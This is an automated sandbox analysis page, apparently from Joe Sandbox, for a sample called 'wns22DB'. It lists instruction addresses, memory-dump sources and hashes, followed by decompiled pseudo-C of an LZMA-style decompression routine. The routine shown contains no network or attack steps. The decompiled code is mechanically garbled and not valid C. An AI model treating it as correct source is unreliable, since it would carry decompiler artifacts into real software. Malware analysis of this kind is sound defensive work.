                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407308
                                                                                                                                                                                                  0x00406c4e
                                                                                                                                                                                                  0x00406c51
                                                                                                                                                                                                  0x00406c54
                                                                                                                                                                                                  0x00406c58
                                                                                                                                                                                                  0x00406c5b
                                                                                                                                                                                                  0x00406c61
                                                                                                                                                                                                  0x00406c63
                                                                                                                                                                                                  0x00406c63
                                                                                                                                                                                                  0x00406c63
                                                                                                                                                                                                  0x00406c66
                                                                                                                                                                                                  0x00406c69
                                                                                                                                                                                                  0x00406c69
                                                                                                                                                                                                  0x00406c69
                                                                                                                                                                                                  0x00406c6f
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406c71
                                                                                                                                                                                                  0x00406c74
                                                                                                                                                                                                  0x00406c77
                                                                                                                                                                                                  0x00406c7a
                                                                                                                                                                                                  0x00406c7d
                                                                                                                                                                                                  0x00406c80
                                                                                                                                                                                                  0x00406c83
                                                                                                                                                                                                  0x00406c86
                                                                                                                                                                                                  0x00406c89
                                                                                                                                                                                                  0x00406c8c
                                                                                                                                                                                                  0x00406c8f
                                                                                                                                                                                                  0x00406ca7
                                                                                                                                                                                                  0x00406caa
                                                                                                                                                                                                  0x00406cad
                                                                                                                                                                                                  0x00406cb0
                                                                                                                                                                                                  0x00406cb0
                                                                                                                                                                                                  0x00406cb3
                                                                                                                                                                                                  0x00406cb7
                                                                                                                                                                                                  0x00406cb9
                                                                                                                                                                                                  0x00406c91
                                                                                                                                                                                                  0x00406c91
                                                                                                                                                                                                  0x00406c99
                                                                                                                                                                                                  0x00406c9e
                                                                                                                                                                                                  0x00406ca0
                                                                                                                                                                                                  0x00406ca2
                                                                                                                                                                                                  0x00406ca2
                                                                                                                                                                                                  0x00406cbc
                                                                                                                                                                                                  0x00406cc3
                                                                                                                                                                                                  0x00406cc6
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406cc8
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406cc8
                                                                                                                                                                                                  0x00406cc6
                                                                                                                                                                                                  0x00406ccd
                                                                                                                                                                                                  0x00406ccd
                                                                                                                                                                                                  0x00406ccd
                                                                                                                                                                                                  0x00406ccd
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406d08
                                                                                                                                                                                                  0x00406d08
                                                                                                                                                                                                  0x00406d0c
                                                                                                                                                                                                  0x00407314
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407314
                                                                                                                                                                                                  0x00406d12
                                                                                                                                                                                                  0x00406d15
                                                                                                                                                                                                  0x00406d18
                                                                                                                                                                                                  0x00406d1c
                                                                                                                                                                                                  0x00406d1f
                                                                                                                                                                                                  0x00406d25
                                                                                                                                                                                                  0x00406d27
                                                                                                                                                                                                  0x00406d27
                                                                                                                                                                                                  0x00406d27
                                                                                                                                                                                                  0x00406d2a
                                                                                                                                                                                                  0x00406d2d
                                                                                                                                                                                                  0x00406d2d
                                                                                                                                                                                                  0x00406d33
                                                                                                                                                                                                  0x00406cd1
                                                                                                                                                                                                  0x00406cd1
                                                                                                                                                                                                  0x00406cd4
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406cd4
                                                                                                                                                                                                  0x00406d35
                                                                                                                                                                                                  0x00406d35
                                                                                                                                                                                                  0x00406d38
                                                                                                                                                                                                  0x00406d3b
                                                                                                                                                                                                  0x00406d3e
                                                                                                                                                                                                  0x00406d41
                                                                                                                                                                                                  0x00406d44
                                                                                                                                                                                                  0x00406d47
                                                                                                                                                                                                  0x00406d4a
                                                                                                                                                                                                  0x00406d4d
                                                                                                                                                                                                  0x00406d50
                                                                                                                                                                                                  0x00406d53
                                                                                                                                                                                                  0x00406d6b
                                                                                                                                                                                                  0x00406d6e
                                                                                                                                                                                                  0x00406d71
                                                                                                                                                                                                  0x00406d74
                                                                                                                                                                                                  0x00406d74
                                                                                                                                                                                                  0x00406d77
                                                                                                                                                                                                  0x00406d7b
                                                                                                                                                                                                  0x00406d7d
                                                                                                                                                                                                  0x00406d55
                                                                                                                                                                                                  0x00406d55
                                                                                                                                                                                                  0x00406d5d
                                                                                                                                                                                                  0x00406d62
                                                                                                                                                                                                  0x00406d64
                                                                                                                                                                                                  0x00406d66
                                                                                                                                                                                                  0x00406d66
                                                                                                                                                                                                  0x00406d80
                                                                                                                                                                                                  0x00406d87
                                                                                                                                                                                                  0x00406d8a
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406d8c
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406d8c
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407019
                                                                                                                                                                                                  0x00407019
                                                                                                                                                                                                  0x0040701d
                                                                                                                                                                                                  0x00407344
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407344
                                                                                                                                                                                                  0x00407023
                                                                                                                                                                                                  0x00407026
                                                                                                                                                                                                  0x00407029
                                                                                                                                                                                                  0x0040702d
                                                                                                                                                                                                  0x00407030
                                                                                                                                                                                                  0x00407036
                                                                                                                                                                                                  0x00407038
                                                                                                                                                                                                  0x00407038
                                                                                                                                                                                                  0x00407038
                                                                                                                                                                                                  0x0040703b
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406de9
                                                                                                                                                                                                  0x00406de9
                                                                                                                                                                                                  0x00406dec
                                                                                                                                                                                                  0x0040715e
                                                                                                                                                                                                  0x0040715e
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004071e5
                                                                                                                                                                                                  0x004071e9
                                                                                                                                                                                                  0x00407207
                                                                                                                                                                                                  0x00407207
                                                                                                                                                                                                  0x00407207
                                                                                                                                                                                                  0x0040720e
                                                                                                                                                                                                  0x00407215
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407215
                                                                                                                                                                                                  0x004071eb
                                                                                                                                                                                                  0x004071ee
                                                                                                                                                                                                  0x004071f1
                                                                                                                                                                                                  0x004071f4
                                                                                                                                                                                                  0x004071fb
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004072d6
                                                                                                                                                                                                  0x004072d9
                                                                                                                                                                                                  0x004071da
                                                                                                                                                                                                  0x004071da
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406f10
                                                                                                                                                                                                  0x00406f12
                                                                                                                                                                                                  0x00406f19
                                                                                                                                                                                                  0x00406f1a
                                                                                                                                                                                                  0x00406f1c
                                                                                                                                                                                                  0x00406f1f
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406f27
                                                                                                                                                                                                  0x00406f2a
                                                                                                                                                                                                  0x00406f2d
                                                                                                                                                                                                  0x00406f2f
                                                                                                                                                                                                  0x00406f31
                                                                                                                                                                                                  0x00406f31
                                                                                                                                                                                                  0x00406f32
                                                                                                                                                                                                  0x00406f35
                                                                                                                                                                                                  0x00406f3c
                                                                                                                                                                                                  0x00406f3f
                                                                                                                                                                                                  0x00406f4d
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407232
                                                                                                                                                                                                  0x00407232
                                                                                                                                                                                                  0x00407236
                                                                                                                                                                                                  0x0040736e
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040736e
                                                                                                                                                                                                  0x0040723c
                                                                                                                                                                                                  0x0040723f
                                                                                                                                                                                                  0x00407242
                                                                                                                                                                                                  0x00407246
                                                                                                                                                                                                  0x00407249
                                                                                                                                                                                                  0x0040724f
                                                                                                                                                                                                  0x00407251
                                                                                                                                                                                                  0x00407251
                                                                                                                                                                                                  0x00407251
                                                                                                                                                                                                  0x00407254
                                                                                                                                                                                                  0x00407257
                                                                                                                                                                                                  0x00407257
                                                                                                                                                                                                  0x00407257
                                                                                                                                                                                                  0x00407257
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406f55
                                                                                                                                                                                                  0x00406f58
                                                                                                                                                                                                  0x00406f8e
                                                                                                                                                                                                  0x004070be
                                                                                                                                                                                                  0x004070be
                                                                                                                                                                                                  0x004070be
                                                                                                                                                                                                  0x004070be
                                                                                                                                                                                                  0x004070c1
                                                                                                                                                                                                  0x004070c1
                                                                                                                                                                                                  0x004070c4
                                                                                                                                                                                                  0x004070c6
                                                                                                                                                                                                  0x00407350
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407350
                                                                                                                                                                                                  0x004070cc
                                                                                                                                                                                                  0x004070cf
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004070d5
                                                                                                                                                                                                  0x004070d9
                                                                                                                                                                                                  0x004070dc
                                                                                                                                                                                                  0x004070dc
                                                                                                                                                                                                  0x004070dc
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004070dc
                                                                                                                                                                                                  0x00406f5a
                                                                                                                                                                                                  0x00406f5c
                                                                                                                                                                                                  0x00406f5e
                                                                                                                                                                                                  0x00406f60
                                                                                                                                                                                                  0x00406f63
                                                                                                                                                                                                  0x00406f64
                                                                                                                                                                                                  0x00406f66
                                                                                                                                                                                                  0x00406f68
                                                                                                                                                                                                  0x00406f6b
                                                                                                                                                                                                  0x00406f6e
                                                                                                                                                                                                  0x00406f84
                                                                                                                                                                                                  0x00406f89
                                                                                                                                                                                                  0x00406fc1
                                                                                                                                                                                                  0x00406fc1
                                                                                                                                                                                                  0x00406fc5
                                                                                                                                                                                                  0x00406ff1
                                                                                                                                                                                                  0x00406ff3
                                                                                                                                                                                                  0x00406ffa
                                                                                                                                                                                                  0x00406ffd
                                                                                                                                                                                                  0x00407000
                                                                                                                                                                                                  0x00407000
                                                                                                                                                                                                  0x00407005
                                                                                                                                                                                                  0x00407005
                                                                                                                                                                                                  0x00407007
                                                                                                                                                                                                  0x0040700a
                                                                                                                                                                                                  0x00407011
                                                                                                                                                                                                  0x00407014
                                                                                                                                                                                                  0x00407041
                                                                                                                                                                                                  0x00407041
                                                                                                                                                                                                  0x00407044
                                                                                                                                                                                                  0x00407047
                                                                                                                                                                                                  0x004070bb
                                                                                                                                                                                                  0x004070bb
                                                                                                                                                                                                  0x004070bb
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004070bb
                                                                                                                                                                                                  0x00407049
                                                                                                                                                                                                  0x0040704f
                                                                                                                                                                                                  0x00407052
                                                                                                                                                                                                  0x00407055
                                                                                                                                                                                                  0x00407058
                                                                                                                                                                                                  0x0040705b
                                                                                                                                                                                                  0x0040705e
                                                                                                                                                                                                  0x00407061
                                                                                                                                                                                                  0x00407064
                                                                                                                                                                                                  0x00407067
                                                                                                                                                                                                  0x0040706a
                                                                                                                                                                                                  0x00407083
                                                                                                                                                                                                  0x00407085
                                                                                                                                                                                                  0x00407088
                                                                                                                                                                                                  0x00407089
                                                                                                                                                                                                  0x0040708c
                                                                                                                                                                                                  0x0040708e
                                                                                                                                                                                                  0x00407091
                                                                                                                                                                                                  0x00407093
                                                                                                                                                                                                  0x00407095
                                                                                                                                                                                                  0x00407098
                                                                                                                                                                                                  0x0040709a
                                                                                                                                                                                                  0x0040709d
                                                                                                                                                                                                  0x004070a1
                                                                                                                                                                                                  0x004070a3
                                                                                                                                                                                                  0x004070a3
                                                                                                                                                                                                  0x004070a4
                                                                                                                                                                                                  0x004070a7
                                                                                                                                                                                                  0x004070aa
                                                                                                                                                                                                  0x0040706c
                                                                                                                                                                                                  0x0040706c
                                                                                                                                                                                                  0x00407074
                                                                                                                                                                                                  0x00407079
                                                                                                                                                                                                  0x0040707b
                                                                                                                                                                                                  0x0040707e
                                                                                                                                                                                                  0x0040707e
                                                                                                                                                                                                  0x004070ad
                                                                                                                                                                                                  0x004070b4
                                                                                                                                                                                                  0x0040703e
                                                                                                                                                                                                  0x0040703e
                                                                                                                                                                                                  0x0040703e
                                                                                                                                                                                                  0x0040703e
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004070b6
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004070b6
                                                                                                                                                                                                  0x004070b4
                                                                                                                                                                                                  0x00406fc7
                                                                                                                                                                                                  0x00406fca
                                                                                                                                                                                                  0x00406fcc
                                                                                                                                                                                                  0x00406fcf
                                                                                                                                                                                                  0x00406fd2
                                                                                                                                                                                                  0x00406fd5
                                                                                                                                                                                                  0x00406fd7
                                                                                                                                                                                                  0x00406fda
                                                                                                                                                                                                  0x00406fdd
                                                                                                                                                                                                  0x00406fdd
                                                                                                                                                                                                  0x00406fe0
                                                                                                                                                                                                  0x00406fe0
                                                                                                                                                                                                  0x00406fe3
                                                                                                                                                                                                  0x00406fea
                                                                                                                                                                                                  0x00406fbe
                                                                                                                                                                                                  0x00406fbe
                                                                                                                                                                                                  0x00406fbe
                                                                                                                                                                                                  0x00406fbe
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406fec
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406fec
                                                                                                                                                                                                  0x00406fea
                                                                                                                                                                                                  0x00406f70
                                                                                                                                                                                                  0x00406f73
                                                                                                                                                                                                  0x00406f75
                                                                                                                                                                                                  0x00406f78
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406cd7
                                                                                                                                                                                                  0x00406cd7
                                                                                                                                                                                                  0x00406cdb
                                                                                                                                                                                                  0x00407320
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407320
                                                                                                                                                                                                  0x00406ce1
                                                                                                                                                                                                  0x00406ce4
                                                                                                                                                                                                  0x00406ce7
                                                                                                                                                                                                  0x00406cea
                                                                                                                                                                                                  0x00406ced
                                                                                                                                                                                                  0x00406cf0
                                                                                                                                                                                                  0x00406cf3
                                                                                                                                                                                                  0x00406cf5
                                                                                                                                                                                                  0x00406cf8
                                                                                                                                                                                                  0x00406cfb
                                                                                                                                                                                                  0x00406cfe
                                                                                                                                                                                                  0x00406d00
                                                                                                                                                                                                  0x00406d00
                                                                                                                                                                                                  0x00406d00
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406e62
                                                                                                                                                                                                  0x00406e62
                                                                                                                                                                                                  0x00406e66
                                                                                                                                                                                                  0x0040732c
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040732c
                                                                                                                                                                                                  0x00406e6c
                                                                                                                                                                                                  0x00406e6f
                                                                                                                                                                                                  0x00406e72
                                                                                                                                                                                                  0x00406e75
                                                                                                                                                                                                  0x00406e77
                                                                                                                                                                                                  0x00406e77
                                                                                                                                                                                                  0x00406e77
                                                                                                                                                                                                  0x00406e7a
                                                                                                                                                                                                  0x00406e7d
                                                                                                                                                                                                  0x00406e80
                                                                                                                                                                                                  0x00406e83
                                                                                                                                                                                                  0x00406e86
                                                                                                                                                                                                  0x00406e89
                                                                                                                                                                                                  0x00406e8a
                                                                                                                                                                                                  0x00406e8c
                                                                                                                                                                                                  0x00406e8c
                                                                                                                                                                                                  0x00406e8c
                                                                                                                                                                                                  0x00406e8f
                                                                                                                                                                                                  0x00406e92
                                                                                                                                                                                                  0x00406e95
                                                                                                                                                                                                  0x00406e98
                                                                                                                                                                                                  0x00406e98
                                                                                                                                                                                                  0x00406e98
                                                                                                                                                                                                  0x00406e9b
                                                                                                                                                                                                  0x00406e9d
                                                                                                                                                                                                  0x00406e9d
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004070df
                                                                                                                                                                                                  0x004070df
                                                                                                                                                                                                  0x004070df
                                                                                                                                                                                                  0x004070e3
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004070e9
                                                                                                                                                                                                  0x004070ec
                                                                                                                                                                                                  0x004070ef
                                                                                                                                                                                                  0x004070f2
                                                                                                                                                                                                  0x004070f4
                                                                                                                                                                                                  0x004070f4
                                                                                                                                                                                                  0x004070f4
                                                                                                                                                                                                  0x004070f7
                                                                                                                                                                                                  0x004070fa
                                                                                                                                                                                                  0x004070fd
                                                                                                                                                                                                  0x00407100
                                                                                                                                                                                                  0x00407103
                                                                                                                                                                                                  0x00407106
                                                                                                                                                                                                  0x00407107
                                                                                                                                                                                                  0x00407109
                                                                                                                                                                                                  0x00407109
                                                                                                                                                                                                  0x00407109
                                                                                                                                                                                                  0x0040710c
                                                                                                                                                                                                  0x0040710f
                                                                                                                                                                                                  0x00407112
                                                                                                                                                                                                  0x00407115
                                                                                                                                                                                                  0x00407118
                                                                                                                                                                                                  0x0040711c
                                                                                                                                                                                                  0x0040711e
                                                                                                                                                                                                  0x00407121
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407123
                                                                                                                                                                                                  0x00406ea0
                                                                                                                                                                                                  0x00406ea0
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406ea0
                                                                                                                                                                                                  0x00407121
                                                                                                                                                                                                  0x00407356
                                                                                                                                                                                                  0x00407378
                                                                                                                                                                                                  0x0040737e
                                                                                                                                                                                                  0x00407380
                                                                                                                                                                                                  0x00407387
                                                                                                                                                                                                  0x00407389
                                                                                                                                                                                                  0x00407390
                                                                                                                                                                                                  0x00407394
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406985
                                                                                                                                                                                                  0x0040738d
                                                                                                                                                                                                  0x0040738d
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040738d
                                                                                                                                                                                                  0x004071da
                                                                                                                                                                                                  0x00407260
                                                                                                                                                                                                  0x00407266
                                                                                                                                                                                                  0x00407269
                                                                                                                                                                                                  0x0040726c
                                                                                                                                                                                                  0x0040726f
                                                                                                                                                                                                  0x00407272
                                                                                                                                                                                                  0x00407275
                                                                                                                                                                                                  0x00407278
                                                                                                                                                                                                  0x0040727b
                                                                                                                                                                                                  0x00407281
                                                                                                                                                                                                  0x0040729a
                                                                                                                                                                                                  0x0040729d
                                                                                                                                                                                                  0x004072a0
                                                                                                                                                                                                  0x004072a3
                                                                                                                                                                                                  0x004072a7
                                                                                                                                                                                                  0x004072a9
                                                                                                                                                                                                  0x004072aa
                                                                                                                                                                                                  0x004072ad
                                                                                                                                                                                                  0x00407283
                                                                                                                                                                                                  0x00407283
                                                                                                                                                                                                  0x0040728b
                                                                                                                                                                                                  0x00407290
                                                                                                                                                                                                  0x00407292
                                                                                                                                                                                                  0x00407295
                                                                                                                                                                                                  0x00407295
                                                                                                                                                                                                  0x004072b7
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004072b9
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004072b9
                                                                                                                                                                                                  0x004072b7
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040712c

                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                                                                                                                  • Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                                                                                                                  • Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 00406E3E Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 98%
                                                                                                                                                                                                  			E00406E3E() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M00407395))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
